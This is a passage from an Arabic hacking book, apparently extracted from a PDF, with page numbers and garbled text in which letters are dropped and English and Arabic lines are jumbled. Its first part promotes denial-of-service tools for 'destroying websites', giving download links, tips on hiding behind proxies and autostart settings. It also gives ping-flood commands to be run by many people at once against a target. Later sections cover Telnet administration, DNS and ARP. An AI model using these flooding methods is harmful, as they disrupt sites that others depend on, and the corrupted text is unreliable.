حتى اذا انقطع الخط فجاءه يتوقف البرنامج و عند معاوده التصال يستمر فى10نضع علمه صح امام التجربه و ل يبدا من الول

6 ل يجرب البرنامج الكلمات التى بها اخطاء التى تظهر فى رقم 11عند و ضع العلمه على

حتى ل يجرب البرنامج الكلمات التى تحتوى على مسافات 12نضع علمه صح امام

ل يجرب البرنامج الكلمات التى اقل من خمس احرف (مطلوب فى الهوت ميل) 13عند وضع العلمه على

ل يجرب البرنامج الكلمات التى هى اكثر من عشره احرف 14و عند وضع العلمه ايضا على

اليس برنامج ممتاز و قوى و سريع وصلة التنزيل :

http://koti.mbnet.fi/hypnosis/caliberx/cracking.htm

انتهى،،،

"WinSmurf" برنامج تدمير المواقع

<ةةةةة ةة ةةةةة ةةةةة>

32

Page 33: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةةة: ةةةةةة>

أثبت هذا البرنامج فعاليته الكبيرة في تدمير المواقع ولسيما أنه قوي جدا في إرسال طلبات وسريع ..

والذي يسميه البعض مرعب المواقع winsmurfإذا هاهو البرنامج الحديث من

Scree Shot--------------------------------------------------------------

--------------------------------------------------------------

؟ ***winsmurf*** كيف تستخدم

يعني نصي وحط في حروف وأرقام كثيرة يعني حاول تخلي الملفtxtفي غاية البساطة فقط قم بإنشاء ملف بعدين احفظه Kb 10كبير شوي وبتعدى winsmurfوبعد كذا قم بتشغيل

واستعرض الملف ...

وصلة البرنامج..

http://www.planet-eagle.de/files/WSmurf.zip

انتهى،،،

لتدمير المواقع "Evil Pingشرح برنامج "

<ةةةةة ةة ةةةة ةةةةةة ةةةةةةةةةة>

33

Page 34: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

. شخص على القل في نفس الوقت على نفس الموقع لينجح التدمير بإذن ال عزوجل200استخدامه من قبل

.ويمكن زيادة الهجمات لتصبح أقوى حتى يتم تدمير الموقع

،،،انتهى

" شرح برنامج الدرة لتدمير المواقع "

<ةةةةة>

34

Page 35: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

عند النتهاء من تحميل البرنامج , فك ضغط الملف , و عند تشغيله سيظهر لك الشكل التالي :

لبدء الهجوم فقط إضغط على

وليقاف الهجوم إضغط على

عند بدء الهجوم سيعمل برنامج الدرة على بحث البروكسي الخاص بك و سيضعه لك في مكانه.

و لتخفي هويتك عند الهجوم قم بتشغيل :

و ضع رقم البروكسي التالي

35

Page 36: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

وسيكون عنوان الموقع المراد الهجوم عليه هنا

و من خواص هذا البرنامج انه ل يستطيع احد تغيير جهة الهجوم و لتجديد عنوان الموقع المراد الهجوم عليه

و هو سيقوم تلقائيا بالبحث و التغيير. فقط قم بضغط

و لمعرفة آخر اخبار البرنامج و المواقع التي تم النجاح بقصفها فقط قم بضغط :

و سيظهر لك الشكل التالي :

و ستظهر لك الخبار. قم بضغط

و لعمل البرنامج بطريقة ذكية بحيث ل يبطيء النترنت , قم بتشغيل :

لتشغيل البرنامج عند عمل الوندوز قم بتشغيل :

36

Page 37: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

الشكل التالي يمثل عدد المرات الناجحة :

: و هذا يمثل عدد المرات الفاشلة

..وصلة تحميل البرنامج

http://www.geocities.com/boom_q8y4/dorrah.zip

،،،انتهى

" تدمير المواقع بدون برامج "

< ةةةةةة:ةةةة ةةة>

37

Page 38: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

في هذا الدرس سأقوم بشرح عدة طرق لتدمير المواقع بدون برامج ولكن هناك شرط لتدميرها أن يجتمع عدد...كبير على الموقع نفسه ويقوموا بتطيق الطريقة معا بعض في نفس الوقت

::الطريقة الولى

قم بالتوجه إلى "الدوس" ===>== اكتب المر التالي :ـ

Ping www.xx.com

Xxx: يعني اسم الموقع

.بعد ذلك سيخرج لك رقم أي بي الموقع

:قم بكتابة المر

ping -n (عددالضربات) I(اسم الموقع) (قوة الضربه) -

مثال ذلك:

ping -n 1000 -l 400 www.xxx.com

الطريقة الثانية::

بعد استخراج الي بي تبع الموقع المراد بالطريقة الي في العلى...

قم بكتابة المر:

ping -t ip

يعني أي بي الموقع الموراد.ipحيث

انتهى،،،

" التلنيت "

<ةةةةة ةة ةةةة ةةةة>

38

Page 39: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

بعد قراءة هذا الموضوع ستكون قادر على

فهم معنى خدمة التلنت

معرفة مكان تشغيل الخدمة والتحكم بها

تمرين التثبيت وإستخدام التلنت

تسمح لمستخدمين عميل التلنت بالتصال بكمبيوتر يشغل خدمة التلنت2000خدمة التلنت في ويندوز ، ويمكن أن تكون خدمة التلنت عبارة لتصال وإستعمال سطر الوامر ويصبح كما لو كان يجلس أمامه

المستخدمين مع بعضهم البعض

عميل تلنت في أي وقت63وأي كمبيوتر يشغل خدمة التلنت يمكن أن يدعم إلى

Telnet Authentication

You can use your local Windows 2000 user name and password or domain account information to access the Telnet server. The security

scheme is integrated into Windows 2000 security. If you do not use the NT LAN Manager (NTLM) authentication option, the user name and password are sent to the Telnet server as plain text.s 2000 security

context for authentication and the user is not prompted for a user

If you are using NTLM authentication, the client uses the Windowname and password. The user name and password are encryptedيمكن استعمال.

إذا كنت تستخدم خيار التحقق من اسمك وكلمة المرور الخاصه بك من اجل الوصول إلى ملقم التلنت ، سيرسل السم و كلمة المرور مشفرة وإذا لم تكن مستخدمة سترسل كنص عادي NTLM الصحة

ملحظة

If the User Must Change Password At Next Logon option is set for a user, the user cannot log on to the Telnet service when NTLM

authentication is used. The user must log on to the server directly and change the password, and then log on through the Telnet clientإذا كان هذا .

الخيار منشط في خصائص كلمة المرور لحد المستخدمين لن يتمكن من الدخول على ملقم التلنت عند يجب الدخول ثم تغير كلمة المرور ثم التسجيل على خدمة التلنتNTLMإستخدام

تشغيل و إيقاف ملقم التلنت

In a Windows 2000 Server default installation, the Telnet service is set to manual startup. You can use the Services snap-in or the Computer

Management snap-in to start, stop, or configure the Telnet service for automatic startup تكون خدمة التلنت غير منشطة وتكون2000. في التثبيت الفتراضي لويندوز

لتشغيل أو إيقاف خدمة التلنت Services ، ويمكن إستخدام الداة على الوضع اليدوي

39

Page 40: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

مكان التلنت

In the Computer Management snap-in, Telnet is a service located under the Services and Applications node. Select Services from the console tree, and then select Telnet from the list of services in the details pane.

تشغيل التلنت و إيقافة من سطر الوامر

You can also start or stop the Telnet service from a command prompt. To start Telnet Server, type net start tlntsvr or net start telnet at the

command prompt, and then press Enter. To stop Telnet Server, type net stop tlntsvr or net stop telnet at the command prompt, and then press

Enter.

Telnet Server Adminالداة

You can use the Telnet Server Admin utility to start, stop, or get information about Telnet Server. You can also use it to get a list of current users, terminate a user's session, or change Telnet Server

registry settings يمكن إستخدام الداة.Telnet Server Adminلتشغيل أو إيقاف أو الحصول الجلسة الحالية من على معلومات عن الملقم ويمكن كذلك الحصول على عدد المستخدمين و التحكم في

إنهاء التصال و تغير العدادات

الموجودةTelnet Administration Tool , أضغط على Telnet Server Adminلفتح الداة . إذا كنت لOK, ثم tlntadmn, اكتب Run, ثم Start أو اضغط Administrative Tools في

).Adminpak.msi ( , تحتاج إلى تثبيت أدوات الدارةTelnet Server Adminتستطيع فتح الداة

Telnet Server Administrationيبين الجدول التالي خيارات الداة

الوصفالسمالخيار

0Quit this application

Telnet Server Adminينهي جلسة الداة

1List the current users

يبين المستخدمين المتصلين بخدمة التلنت مع توضيح اسم المستخدم و الدومين و وعنوان الجهاز ووقت الدخول

2Terminate a user session

ينهي جلسة أحد المستخدمين الذي أنت تختاره

3Display/change registry settings

يزود قائمة بإعدادات السجل التي يمكن تغيرها

4Start the serviceيشغل خدمة التلنت

5Stop the serviceيوقف خدمة التلنت

إصطياد المشاكل

يبين الجدول التالي بعض المشاكل التي يمكن أن تواجهك عند إستخدام التلنت

40

Page 41: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

الحلالسببرسالة الخطاء

Invalid inputراجع الخيارات وأعد كتابة خياركالقيمة المكتوبة لم تكن مقبولة

Failed to open the registry key

شغل خدمة التلنتخدمة التلنت غير مشتغلة

Failed to query the registry value

شغل الخدمةخدمة التلنت غير مشتغلة على الملقم

عميل التلنت

You can use Microsoft Telnet Client to connect to a remote computer running the Telnet service or other Telnet server software. Once you

have made this connection, you can communicate with the Telnet server. The type of session you conduct depends on how the Telnet

software is configured. Communication, games, system administration, and local logon simulations are some typical uses of Telnet.

The Telnet client uses the Telnet protocol, part of the TCP/IP suite of protocols, to connect to a remote computer over a network. The Telnet

client software allows a computer to connect to a remote server. You can use the Telnet client provided with Windows 2000 to connect to a

remote computer, log on to the remote computer, and interact with it as if you were sitting in front of it.

Users of previous versions of Microsoft's Telnet client may notice a few changes in the version included with Windows 2000. The most obvious

change is that Microsoft Telnet Client is now a command-line application rather than a Windows application. As a command-line

application, Microsoft Telnet Client will seem very familiar to users of UNIX-based Telnet clients.

An important new feature found in Microsoft Telnet Client is NTLM authentication support. Using this feature, a computer using Microsoft

Telnet Client can log on to a Windows 2000 computer running the Telnet service by using NTLM authentication.

إستعمال التلنت

في موجه الوامر.telnet. وتستطيع كتابة telnet, ثم اكتب Run, ثم Start, انقر Telnetلتشغيل مثبت على جهازك ومضبوط تكوينه ويكونTCP/IPلتتمكن من أستخدام التلنت يجب أن يكون البروتوكول

لديك حساب مسجل على الجهاز الذي ستتصل به

To display help for Telnet, type help at the Microsoft Telnet command prompt. To connect to a site, type open <computer_name> where

<computer_name> is the IP address or host name of the computer running the Telnet service.

41

Page 42: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

تمرين ضبط وإتصال بخدمة التلنت

في هذا التمرين يجب أن يكون لديك شبكة على القل جهازين متصلين مع بعضهم البعض

Hishem2 و الثاني Hishem1ولنفترض أن الجهاز الول اسمه

Hishem2 إلى Hishem1 ثم سنقوم بالتصال من Hishem2وسنفترض أن خدمة التلنت مثبته على

Hishem1 سنقوم الن بتثبيت الخدمة على جهاز

Administrator ك Hishem1سجل الدخول إلى

. Services اضغط Administrative Tools, ثم Programs , ثم Startمن

Servicesتظهر الداة

. Telnetمن النافذه مرر ألى اسفل ثم ضغط مزدوج على

)The Telnet Properties (Local Computerيظهر مربع حوار

.Automatic إلى Manual من Startup Typeغير

.Start,اضغط Service statusفي القسم

Local Computer) Telnet properties لغلق مربع الحوار (OKاضغط

. Servicesأغلق وحدة التحكم

Hishem2 إلى Hishem1سنتصل من

.Run , ثم Startمن

. OK ثم telnetاكتب

تظهر موجه أوامر مايكروسوفت تلنت

أو ? لمشاهدة الوامر المتاحه helpاكتب

تظهر جميع الوامر المدعومة في خدمة التلنت

open Hishem2اكتب

ستشاهد شاشة الترحيب

42

Page 43: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ملحظة

open بدل oيمكن إستخدام حرف

Hishem2أي اوامر يمكنك تشغيلها من سطر الوامر في

لمشاهدة جلسة التلنتHishem2اترك هذا التصال نشط ل توقفه سننتقل الن إلى جهاز

Hishem1 سنراقب خدمة التلنت ثم نوقف ونقطع التصال من العميل Hishme2من جهاز

.Run , ثم Startمن

. OK ثم tlntadmnاكتب

Telnet Server Adminيظهر إطار اوامر الداة

لمشاهدة جميع التصالت الحالية كما في المثال نشاهد قد عرض اسم المستخدم و اسم الدومين1اكتب NORورقم IP ونوع التصال ووقت الدخول

لنهاء جلسة مستخدم 2اكتب

43

Page 44: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

تظهر رسالة تطلب منك تحديد هوية المستخدم الذي تريد فصله

1 ول يوجد معنا في المثال غير و احد لذالك تكتب هذا رقم المستخدم في القائمة1اكتب

تظهر لئحة بالوامر المتاحة

سترا أن التصال قد إنفصل مثل المثال Hishem1إرجع إلى جهاز

اضغط أي مفتاح للمتابعة

كيف نستفيد من خدمة التلنت في جلب البريد

يمكن أن تستخدم التلنت لسحب البريد وحذف إذ تعذر عليك سحب البريد بالبرامج المخصصة لسبب ماالرسائل التي قد تكون سبب المشكلة و الطريقة كما يلي

تكون على إتصال مع الشبكة

طبعا إذا كان حسابك معTelnet pop.mail.yahoo.com 110 ثم تكتب Run ثم Startمن الياهو أو اكتب الحساب الخاص بك مع ملحظة وجود فراغ بين الكلمة الولى و الجملة الثانية و الرقم

مع ملحظة أن الذي ثم اكتب بعدها اسم المستخدم في بريدك userستظهر لك نافذة مثل الدوس اكتب ثم إنتر user xxxx ستكتبه ل تشاهده على النافذة ل تهتم مثل

ثم إنتر pass xxxx ثم اكتب الرقم السري مثلpassبعد ذلك اكتب

بعد ما تضغط إنترOk ستشاهد كلمة إذا كان إدخالك صحيح

سيتم إدخالك إلى الحساب

ثم إنترList اكتب لمشاهدة جميع الرسائل وأحجامها

ستشاهد ترتيب الرسائل تحت بعض وأمام كل رقم رقم ثاني يدل على حجم الرسالة

44

Page 45: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ثم رقم الرسالة الهدفdeleلحذف رسالة من القائمة اكتب

popتنفع هذه الطريقة مع بريد

من الدكتور الفنتوخ طريقة سحب البريد عن طريق التلنت

بعض الوامر المستخدمة مع التلنت

وصل عميل التلنت مع جهاز بعيد

بناء الجملة

open [\\RemoteServer] [Port[

المعلمات

\\RemoteServer

تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقما ما، سيتم افتراض الملقم المحلي.

Port

تحديد المنفذ الذي تريد استخدامه. إن لم تحدد منفذا ما، سيتم افتراض المنفذ الفتراضي.

ملحظات

. oيمكنك اختصار هذا المر إلى

أمثلة

، اكتب:44 من خلل رقم المنفذ Redmondللتصال بملقم بعيد o redmond 44

من كمبيوتر بعيدTelnetلقطع تصال عميل

بناء الجملة

close [\\RemoteServer[

المعلمات

45

Page 46: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

\\RemoteServer

تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقما ما، سيتم افتراض الملقم المحلي.

ملحظات

. cيمكنك اختصار هذا المر إلى

أمثلة

، اكتب:Redmondلقطع التصال من ملقم بعيد c redmond 44

Telnet لرسال أوامر عميل

بناء الجملة

send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch[?] [

المعلمات

\\RemoteServer

تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقما ما، سيتم افتراض الملقم المحلي.

ao

إحباط أمر الخراج.

ayt

?". Are you thereإرسال أمر "

esc

إرسال حرف الهروب الحالي.

ip

مقاطعة أمر العملية.

synch

. Telnetأداء عملية تزامن

Telnet لعرض العدادات الحالية لعميل

46

Page 47: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

بناء الجملة

display

المعلمات

بل

ملحظات

(بعبارةTelnet. إذا كنت في جلسة عمل Telnet معلمات التشغيل الحالية لعميل displayيسرد المر لتعديل المعلمات بضغطTelnet)، يمكنك الخروج من جلسة عمل Telnetأخرى، إذا كنت متصل بملقم

CTRL للعودة إلى جلسة عمل .[+Telnet اضغط ،ENTER .

tlntadmnإدارة ملقم التلنت المحلي بالـ

Telnet لدارة كمبيوتر يشغل ملقم

بناء الجملة

tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue[

المعلمات

\\RemoteServer

تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقما ما، سيتم افتراض الملقم المحلي.

start

. Telnetبدء تشغيل ملقم

stop

. Telnetإيقاف تشغيل ملقم

pause

. Telnetمقاطعة ملقم

continue

. Telnetاستئناف ملقم

ملحظات

إذا كان كل من جهازيtlntadmn باستخدام الوامر Telnetيمكنك إدارة كمبيوتر عن بعد يشغل ملقم . ل يمكنك2000 استخدمه بي ويندوز 2000الكمبيوتر يشغلن نفس نظام التشغيل فإذا المطلوب ويندوز

47

Page 48: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

منTelnet وملقم Windows 2000 لدارة كمبيوتر عن بعد يشغل tlntadmnاستخدام الوامر مثل. Windows XPكمبيوتر يشغل

Telnet لتعيين الحد القصى لعدد التصالت على كمبيوتر يشغل ملقم

بناء الجملة

tlntadmn [\\RemoteServer] config [maxconn=PositiveInteger[

المعلمات

\\RemoteServer

تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقما ما، سيتم افتراض الملقم المحلي.

maxconn=PositiveInteger

10تعيين العدد العظمي للتصالت. يجب عليك تحديد هذا العدد بواسطة عدد صحيح موجب أصغر من مليين.

Telnet لتعيين العدد العظمي لمحاولت تسجيل الدخول الفاشلة على كمبيوتر يشغل ملقم

بناء الجملة

tlntadmn [\\RemoteServer] config [maxfail=PositiveInteger[

المعلمات

\\RemoteServer

تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقما ما، سيتم افتراض الملقم المحلي.

maxfail=PositiveInteger

تعيين الحد القصى لمحاولت تسجيل الدخول الفاشلة المسموح بها للمستخدم. يجب عليك تحديد هذا العدد. 100بواسطة عدد صحيح موجب أصغر من

Telnet لتعيين المهلة من أجل خمول جلسات العمل على كمبيوتر يشغل ملقم

بناء الجملة

tlntadmn [\\RemoteServer] config [timeout=hh:mm:ss[

المعلمات

\\RemoteServer

48

Page 49: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقما ما، سيتم افتراض الملقم المحلي.

timeout=hh:mm:ss

تعيين فترة المهلة بالساعات، والدقائق، والثواني.

دائما يستخدم الـ

لعرض التعليمات في موجه الوامر..?/

انتهى،،،

"DNS" معلومات عن الـ

<ةةةةة ةة ةةةةة ةةةةة>

>Dark Devil<ةةةةةة:

قبل ان نبدأ دعونا نعقد اتفاق معا : فلننسا كلمه هكر و لنبدأ فى تعلم الشياء التى توصلنا لكلمه هكر بمعنى الكلمه و طبعا الهكر ليس معنا

تروجن هورسس او سب سفن .....الخ الهكر الحقيقى هو تعلم نظم التشغيل مثل اللينكس و اليونكس و تعلم لغات تصميم المواقع بجانب بعض لغات

Cالبرمجه التى يكون اهمها فى مجالنا هى لغه السى و الن دعونا من كل هذه الخلبيط و لنبدأ التكلم فى المفيد:

نحن فى بعض الحيان نسمع عن اشياء كثيره و لكن ل نعرف ما هى و ل نحاول ان نكتشف و نعرف ما هىو فى هذا الملف سوف نتكلم عن شئ نسمع عنه كثيرا و لكن معظمنا ل يعرف

ما هو ::DNSو هذا الشئ هو ال

و سوف نبدأ بالتحدث عن هذا السم الذى يسمعه الكثيرين و لكن ل يعرفون ما هو :و لنبدأ بالسؤال نفسه

==================================================

=========================?DNSما هو ال

49

Page 50: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

============== عادتا علىDNS . و يتصل سرفر ال Domain Name System هو اختصار لكلمه DNSاول : حقه فسوف تتصل DNS مما يعنى انك اذا اردت التصال الى احد المواقع و استعملت ال 53بورت

وtranslates alphabetical hostnames و سوف يترجم او يحول ال 53به عن طريق البورت و127.0.0.1 مثل IP ADRESSES الى /http://www.burn.comيعنى اسم الموقع مثل :

العكس صحيح و عندما تتم العمليهتتصل بالموقع مباشره

اوIP اى تحويل او تحليل عنوان الموقع الى address resolutionو عمليه التحويل هذه تسمى العكس لنستطيع التصال به

لجعلDNS .و لكن قد ظهر ال address resolution كان اسم اخر لعمليه ال DNSو قبل ظهور ال توزيع الهوستس اسهل بكثير من الماضى حيث انه من

) .IPالسهل ان تتذكر اسم موقع معين تريده افضل من ان تتذكر اربعه خانات من الرقام ( كان يتكون من ملف اسمه الDNS قبل ال address resolutionو كان السم المستعمل ل ال

HOST FILE و كان عباره عن اسماء الهوستس اى المواقع Stanford Research Institute's الخاصه بهم و كان هذا الملف تتولى رعايته IPو عنواوين ال

Network Information Center (SRI-NICو كان على هذا الراعى ان .( ) الجدول هذا حوالى كل اسبوع و يمده بالعنواوين الجديده و الرقام التى ظهرت و علىUPDATEيجدد (

السيستم ادمين ان يجدد هو الخر ملفه او .SRI-NIC بينه و بين الراعى اى FTPعن طريق اتصال ال

و طبعا مع تطور النترنت الرهيب و السريع بدأ هذا النظام فى الفشل و بدأو يبحثون عن النظام المثل الذىيستطيع التحكم فى الهوست و الى بى

ليفعل ذلك.DNSمعا فى وقت واحد و بسرعه و بترتب و دقه و طبعا ظهر ال اى انه ليس هناك ماكينه او سيستم معين يتحكم فى كلdecentralized ليس له مركز اى DNSو ال

عباره عن داتا بيزDNS بل بالعكس فال DNSال يعرف اين يبحث عندما يريد انDNSموزعه بشكل منظم و توجد على كذا سرفر مختلف و كل سرفر عليه

يحصل على معلومه معينه او هوست معين. و كيف كان النظام قبل اكتشافه و هى ايضا نظره عامه عن حركهDNSهذا بالنسبه لمعلومات عامه عن ال

النترنت القديمه .

THE DNS SERVER:================

او النظم الشبيهه باليونكسUNIX هو عباره عن كمبيوتر و يعمل عادتا على نظام DNS SERVERال ). و يوجد ايضاBerkeley Internet Name Domain اى (BINDو يستخدم برنامج اليونكس

برامج مثل هذه للويندوز و الماكنتوش ايضا .UNIX و لكن الكل يفضل ال DNS SERVERاذا اراد احد استعمالهم ك

من جزئين :DNSو يتكون برنامج ال the name server itself (the daemon program that listens to port 53و الخر (

RESOLVERيسمى هذا يستجيب الى متصفحك عندما تطلب معلومه معينه فمثل عندما تفتحNAME SERVERو ال

النترنت اكسبلورر و تكتب او تطلب منه موقه معين مثل http://www.burn.com/ فسيسئل المتصفح اقرب DNSموجود له (و هذا يعتمد على اتصالك

/http://www.burn.com ل IPبالشبكه و رقم الى بى الخاص بك) عن عنوان ال ليجد السرفر الذى لديه هذا الهوست اى هذا الموقع و يطلب محتويات الموقعIPلن المتصفح يحتاج هذا ال

من السرفر ليعرضها لك فى متصفحك. فى جداوله اى فى ذاكره متصفحك عن الموقع الذى تطلبهdaemon programو قبل هذا سيسئل ال

فأذا لم يجده ينتقل الى ما سبق شرحه و هكذا تتم العمليه.

THE TREE INFORMATION:======================

DNS معين من المتصفح حقك و ل يجده فى ال IPو الن اصدقائى بعد ان اتقفنا على انك عندما تطلب رقم

50

Page 51: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

العلى منه فى المستوى عنه ليجده و اذا لم يجدهDNS SERVERالمحلى اى الخاص بك سوف يسأل ال فى مستوى اعلى فينتقل للبحث فى مستوى اعلى و اعلى و هكذا يسير البحث من القل الى العلى فى

.DNS SERVERSمستويات ال و طبعا نتيجه من هذا التصال فنستنتج وجود شجره اتصال و معلومات و لكن كيف تعمل بالضبط

دعونا نأخذ مثال : و هذا يعتمد على اتصالك بالنترنت اى حسبisp.co.uk الخاص بك كان مثل ISPلو فرضنا ان ال

ISP's DNS server'sالشركه و السرفر الذى تشبك عليه فمن الطبيعى طبعا ان يكون ال hostname مثل هذا dns.isp.co.uk و الن فالنفرض انك سألت هذا ال DNS ليبحث لك عن IP

بالبحث فى جداولهdns.isp.co.uk مثل فسيقوم هذا ال /http://www.burn.comالخاص ب DNSالمحليه المخذنه فى الذاكره عنده فيجدها و اذا لم يجدها فسينتقل كما قلنا الى مستوى اعلى من ال

SERVERليبحث فيه و اذا لم يجده ايضا فى المستوى العلى فعليه ان يقوم بتغيير مكان البحث كليا فمثل ,school.edu.uk او some-organization.org.uk الى dns.isp.co.ukمن

university.ac.uk, england.gov.uk, airforce.mil.ukو الخ و هناك امثله كثيرا طبعا و كل و اذا لم يجده ايضا فى كل الماكن المتاح له البحث فيها فسيرجع المتصفح الى اكبرUKشئ ينتهى ب

DNS موجود على الشبكه و اسمه ال ROOT فهو يحتوى على كل عناوين ال IPعلى كل للمواقع .DOMAIN NAMEالموجوده على اى

When and why does DNS "hang" or fail?======================================

الذى طلبتهIP الخاص بك يحنوى على ال ISP ان يكون بطئ او سريع .اذا كان ال DNSو يمكن ايضا لل فسوف يحتاج فقط الى اجزاء من الثانيه ليأتى به لك و يعرضه فى متصفحك. اما اذا انتقل المتصفح للبحث

ثانيه . و فى حاله انه ل15 فسوف يحتاج الى قليل من الوقت يمتد حتى DNSفى مستوى اعلى من ال و هذا يحدث نتيجهaddress could not be foundيجده سوف تأتيك رساله من متصفحك تقول

خطأ ليبحث عنه و بالتالى طبعا فهو ليس موجود من الساس ليعرضه اوIP او HOSTاعطاء المتصفح .TIMED OUT اى عمليه DNSنتيجه طول البحث فيقوم متصفحك بقدان التصال مع ال

طبعا حسب متصفحك .RELOAD او REFRESHو فى هذه الحاله نضغط فى المتصفح على

ارجو ان اكون قد افدتكم جميعا بهذه المعلومات التى هى بعيده عن الهكر و لكنها اساس فى تعلم الهكر يا اصدقائى و كما قلت لكم الهكر ليس التروجان و الباتشات الهكر هو تعلم اساليب البرمجه و كيفيه تصميم

المواقع و معرفه كل شئ جديد فى عالم النترنت و ارجو من المحترفين الدخول و قرائه الموضوع و تصحيح الخطاء التى به حتى يكون موضوع كامل و متكامل خالى من الخطاء و نتظر ردودكم و تفاعلكم مع

المعلومات و اى سؤال انا موجود على قد مقدرتى و سنعرف ما هو بالتفصيل SSLو انتظرو موضوعى القادم و هو معلومات عن ال

و السلم عليكم و رحمه ال و بركاته.

انتهى،،،

51

Page 52: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"Routing in the Internetمعلومات عن "

<ةةةةة ةة ةةةةة ةةةةة>

>Dark Devil<ةةةةةة:

السلم عليكم و رحمه ال و بركاته: سوف نتكلم يا اصدقائى عن شئ مهم فى علم الشبكات و الكثير منكم على غير علم به و هذا الشئ هو ال

Routing .و الن دعونا نبدأ و اتمنى ان يعجبكم الموضوع و تستفيدون منه:

Routing in the Internet : =========================

what is routing !? الروتنج هو عباره عن تكنيك او ميكانزم الذى عن طريقه تنتقل المعلومات من كمبيوتر الى اخر او من

هوست الى اخر. و فى سياق النترنت يوجد ثلث مظاهر من الروتنج وهم:

1-Physical Address Determination

2-Selection of inter-network gateways

3-Symbolic and Numeric Addresses

52

Page 53: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

من الكمبيوتر.فمن الدرورى ان نغلف هذهipو يعتبر الول فى هذه الشياء هو المهم عندما تنتقل داتا ال بأى أطار من اى صيغه تكون متصله بالنت ورك المحليه للجهاز او بالنت ورك المتصلipالداتا الخاصه بال

بها الجهاز فى حالته الموجود عليها عند انتقال هذه الداتا.و يتطلب هذا الغلف التضمين من ال عنوان النت inclusion of aورك المحليه او العنوان الفيزيائى لهذا للشبكه مع الطار الذى يحيط بالبيانات اى (

local network address or physical address within the frame .(

و الشئ الثانى من المذكور اعله مهم ايضا و درورى لن النترنت تتكون من عدد من النت وركس المحليه .و هذه المداخل عموماgateways مربوطه بواحد او كثير من المداخل اى الlocal networksاى

,احيانا يكون لها اتصالت فيزيائيه او بورتات مع الكثير من النتroutersتسمى بالروترس اى ال و تتضمنrouting هذا ما نسميه روتنج اى ipوركس .و تحديد المدخل الملئم و البورت لتفصيل داتا ال

ايضا داخل تبادل المعلومات بطرق معينه.

من الشكل الكتابىaddress translationو الثالث من المذكور هو الذى يتضمن انتقال العنوان اى ال الذى نعرفه و نستطيع التعرف عليه بسهوله و المقصود مثل عنوان المتصفح اى

http://www.burn.com/ الى ipاى الى اشياء رقميه معقده صعبه و تؤدى هذه المهمه عن طريق ال DNSارجو مراجعه موضوعى الول عن ال) DNS .( للستفاده اكثر

اى : Physical Addressو الن ندخل فى شرح عمليه تحديد الPhysical Address Determination :

=============================== اذن فأنه يحتاج الى ان يغلف بأطار مخصص و تابع للنتوركip dataاذا كان يريد جهاز كمبيوتر ان ينقل

المتصل الجهاز بها. و لنجاح هذا النتقال فى ظل الغليف بهذا الطار من الدرورى ان نحدد ما يسمى بالphysical addressلتجاه الكمبيوتر. و هذا يتم بنجاح و ببساطه عن طريق استخدام جدول سوف

ip , فمثل هذا الجدول يحتوى على عناوين الphysical addresses الى ipيوضح كيفيه تحويل الللنتوركس و الدرس او العنوان المعروف لها .

و للحصول على هذا الجدول و قرائته من الطبيعى ان يكون الكمبيوتر يستخدم بروتوكول معين للحصول على اىARP و هذا البروتوكول يعرف بأسم physical addresses الى ipهذا الجدول و تحويل ال

Address Resolution Protocolاى بروتوكول تحليل الدرس و اعتقد اننا الن ادركنا و فهمنا ARP , و يمكن ان نعرف هذا الجدول بأسم physical addresses الى ipمعنى كلمه تحويل ال

cache .

و فى اليونكس ايضا نستخدم نفس المر. arp -aو للحصول على الجدول نستخدم امر و هذا مثال حى من جهازى على الجدول الذى يظهر بعد تنفيذ المر :

C:\WINDOWS>arp -a

Interface: 62.135.9.102 on Interface 0x2 Internet Address Physical Address Type

207.46.226.17 20-53-52-43-00-00 dynamic 213.131.64.2 20-53-52-43-00-00 dynamic

213.131.65.238 20-53-52-43-00-00 dynamic

النترنت ادرس الموجود امامكم هذا هى عناوين كل الشبكات المتصله بجهازى بعد دخولى الى النترنت اعتقد انكم تلحظون انه ثابت ل يتغير و بهذا يمكننا ان نقول و نوضح لكم انPhysical Addressو ال

اى رقم الجهاز نفسه الذى تتصل به النتوركسMac Address هذا هو ال Physical Addressال مهم جدااا فى عمليه نقلPhysical Addressاثناء العمل و لذلك فقد قلت فى كلمى ان تحديد ال

اذن فكيف ستتعرف الباكيدجس الموجوده فى الPhysical Address لنه بدون ipمعلومات او داتا الrouter .على طريقها

اى انه غير ثابت بمعنى انه يتغيير عند عمل ريستارت لكل مره فىdynamic هذا مكتوب typeو ال الجهاز و لكنه يثبت اثناء العمل على النترنت .

53

Page 54: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

اى الثابت الذى ل يتغير "هذا فقط للتوضيح" staticو هناك النوع الخر و هو ال

